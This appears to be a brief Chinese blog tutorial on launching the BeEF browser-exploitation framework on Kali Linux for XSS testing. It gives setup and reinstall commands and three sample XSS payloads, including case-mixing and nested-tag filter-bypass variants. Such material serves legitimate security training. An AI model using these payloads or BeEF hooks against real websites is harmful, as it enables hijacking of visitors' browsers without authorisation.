kali用beef实现xss漏洞攻击测试
一、Kali开启网络监听:
service apache2 start
二、启动 Kali beef-xss 模块:
beef-xss
如果需要查看密码路径root权限,可以用以下指令:
vi /etc/beef-xss/config.yaml
其它指令,如下:
apt-get remove beef-xss //卸载beef-xss apt-get purge beef-xss //删除beef-xss配置 rm -r /usr/share/beef-xss/ //重点,彻底删除beef-xss所有的用户配置,0保留 apt-get install beef-xss //重新输入密码后,就可以正常使用了
三、复制脚本,如下图所示:
四、链接执行xss木马形式:
五、链接本地成功查看:
六、发起:
payload:
正常方式 <script>alert(1)</script>
大小写方式绕过 <ScRiPt>alert(1)</ScRiPt>
乱排序绕过 <scr<script>ipt>alert(1)</scr<script>ipt>
分类:
Linux / KALI Linux
, 渗透/安全
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
2021-07-25 关于 Enigma Virtual Box 的使用笔记(虚拟路径)